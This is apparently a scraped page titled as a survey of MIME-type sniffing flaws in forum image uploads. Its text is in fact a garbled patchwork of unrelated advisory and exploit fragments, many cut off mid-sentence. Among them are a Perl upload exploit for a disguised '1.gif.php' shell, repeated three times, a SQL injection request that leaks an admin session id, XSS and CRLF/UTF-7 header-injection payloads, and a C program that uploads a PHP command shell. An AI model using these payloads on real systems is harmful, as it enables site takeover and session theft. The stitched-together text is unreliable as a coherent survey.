Next Page >>
MIME type
Survey: "MIME/Content-Type-Sniffing" Issues in Image Uploads in Forum Scripts
Author: Jacques Copeau
Abstract
====================================================
Internet Explorer, especially versions 7 and 6, can be tricked to treat images
as html, opening XSS vulnerabilities in software that allows uploads.
IN a survey, we found myBB, fluxBB, phorum, SMF and WBB to be vulnerable to
such attacks.
The execution of the PHP code despite the .php.jpg extension is possible because Apache
allows for multiple extensions. Here is a quote from Apache docs regarding this matter:
"
Files can have more than one extension, and the order of the extensions is normally irrelevant.
For example, if the file welcome.html.fr maps onto content type text/html and language French then
the file welcome.fr.html will map onto exactly the same information. If more than one extension is
given that maps onto the same type of meta-information, then the one to the right will be used,
except for languages and content encodings. For example, if .gif maps to the MIME-type image/gif
and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with
the MIME-type text/html.
From: <msnmsgr:bbbbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157
IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\";
filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data;
name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
----
some wireshark's dump samples:
POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
brlc> == What is MIME? ==
brlc> MIME is the standard format for email-messages. One could say, MIME is for
brlc> email, what html is for the web. The first RFC for MIME was published in
brlc> 1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
brlc> MIME is a recursive data format. MIME objects consist of a header and a
brlc> body, where the content-type field of the header specifies the type of the
brlc> body. The body can consist of several separated MIME-objects, a single
brlc> MIME-object, a block of text, an encoded image or about anything specified
brlc> in the header. It is possible to read some real-world examples by opening
brlc> some emails and hitting "show source".
More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html
- -Source code from mod_autoindex.c--------------
#if APR_HAS_UNICODE_FS
ap_set_content_type(r, "text/html;charset=utf-8");
#else
ap_set_content_type(r, "text/html");
#endif
- -Source code from mod_autoindex.c--------------
== What is MIME? ==
MIME is the standard format for email-messages. One could say, MIME is for
email, what html is for the web. The first RFC for MIME was published in
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the content-type field of the header specifies the type of the
body. The body can consist of several separated MIME-objects, a single
MIME-object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".
string size value (such as 0x000061A8 followed by 25,050 A's),
applications that do not properly apply boundary checks will result in a
stack-based buffer overflow. This is due to most applications reading
data until they encounter a NULL byte.
Vulnerability #4: Picture MIME-Type Size Heap Overflow
The Picture Metadata block allows the insertion of a MIME-Type for the
embedded album art in a FLAC file. This field is vulnerable to a
heap-based overflow when applications that support FLAC album art
attempt to process an overly large MIME-TYPE Size field. Again arbitrary
code execution depends on the location of the overwritten memory, the
TECHNICAL BACKGROUND
The Proof of Concepts below exploit the aforementioned issue by taking
advantage of other features of Internet Explorer. Keep in mind that:
* Besides the common web content types (such as plain http, image, audio
and video) the browser is also able to render other standardized content
types, among them, MIME HTML or mhtml. And, overriding the way IE
chooses to render a file (described in [3]) presents a way to enforce
the rendering type as MIME HTML by using the protocol handler for mhtml
in the following manner:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='
If admin is currently logged in, attacker will see his session id in the email field of 'UserSettings' form.
used by scheme-specific and producer-specific algorithms for
delimiting data subcomponents within a URI."
A previous writer has correctly noted that Microsoft recommends just the opposite: that "+" characters should be percent-encoded.
Below are the responses to your test URL from various versions of Apache servers on different platforms. Note that the iso-8859-1 charset is specified by the Content-Type header in all cases. The last example is with Apache 2.2.8 modified to include a <meta http-equiv> tag in the body. The behavior remains the same in both Firefox or IE with this change.
It is a problem for web server developers when a vulnerability is accepted and propagated with a description like:
"here is a malicious URL - the victim must perform these manual steps with it - We leave it to other hackers to upgrade the attack and make it fully automatic."
It is a disappointment that CVE-2008-2168 was accepted so uncritically.
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/xml
21db
<?xml version="1.0" encoding="UTF-8"?>
<eyeMessage>
<action>
rendered as if it belonged to the *Internet Zone* but since the file
containing it is stored in '\\127.0.0.1' it would also be able to access
any other file on the visitor's file system.
The problem is derived from the sequence of actions performed by
Internet Explorer to determine the content-type of the content to be
loaded and the appropriate way to render it. The algorithm followed for
this purpose is described in Microsoft's Knowledgebase article titled
MIME Type Detection in Internet Explorer [4] and implemented in the
function 'FindMimeFromData' in 'URLMON.DLL'[5].
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
As I mentioned at my site (http://websecurity.com.ua/3762/), where I posted
about this XSS vulnerability in Invision Power Board, the fix offered by
Xacker is not effective. And better to use another method of fixing offered
by me.
Author of this advisory said, that in IPB a MIME-type application/x-dirview
is set for txt files. But at my forum (on IPB 2.2.2) for txt files a
MIME-type text/plain was set by default and the attack was worked. So
recommendation of the author to set text/plain is not effective (and in IPB
1.x there is no possibility to set MIME-type at all) and I recommend to
turn-off support of txt files at the forum.
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
$mklib->error_page($message);
exit;
}
@chmod("mkportal/blog/images/tmp/$file_name", 0644);
//Validate by mime type
$tmpfilename = "mkportal/blog/images/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size) {
@unlink($tmpfilename);
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
3. OR
1. The trusted website uses blacklist to block known
executable file types for scripted content. E.g. html, jsp, etc.
2. Attacker uploads a file with extension .rss/.atom/arbitary
extension preceded by .rss/.atom [e.g. .atom.tx]. Most widely used Apache
web server passes Content-Type as “application/{atom/rss}+xml” for all the
three cases automatically in default configuration.
3. Attacker convinces victim to visit the direct link to
uploaded file.
4. Victim’s cookies and other sensitive data gets sent to
attacker’s site.
HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
issue. The URLMON sniffing vulnerability refers to the variant
discovered in the CORE-2008-0826 time line. When loading a local file
Internet Explorer's HTML rendering engine [7] will only check its MIME
type to see if it is a positive match on the files it can handle. For
unknown types that are treated as HTML because they've been referred to
by a redirection, content type determination will default to 'text/html'
in absence of a type explicitly set by the content source. In the case
of non-html files for which there isn't an explicit content-type set,
URLMON will default to the 'text/html' type as suggested from the
redirection. As a result Internet Explorer will end up loading non-html
local files and rendering them as HTML and running any scripting code
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body>
<script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite the
page charset and therefore bypass the XSS filter which uses the prior
encoding. A good example for this is with utf-7, the following request:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-
Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-
alert('owned')+ADw-/script+AD4-</body></html>
6. *Solutions and Workarounds*
On the server side, you can upgrade to a non-vulnerable version. Onthe
client you can use a browser that obeys the Content-Type header
specified by the server, such as Mozilla Firefox, Google Chrome, Apple
Safari or Opera. Internet Explorer 8 with the XSS Filter won't execute
the malicious scripts.
by another site. An anonymous security researcher, via TippingPoint's
Zero Day Initiative, also independently reported this issue to Mozilla
(CVE-2009-3988).
Mozilla security researcher Georgi Guninski reported that when a SVG
document which is served with Content-Type: application/octet-stream
is embedded into another document via an <embed> tag with
type=image/svg+xml, the Content-Type is ignored and the SVG document
is processed normally. A website which allows arbitrary binary data to
be uploaded but which relies on Content-Type: application/octet-stream
to prevent script execution could have such protection bypassed. An
to be logged in.
Example packet:
POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
int main(int argc, char *argv[]) {
int sd;
char code[] = "--AaB03x\r\n"
"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
"Content-Type: text/plain\r\n"
"\r\n"
"<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"desc\"\r\n"
"\r\n"
Next Page>>
|
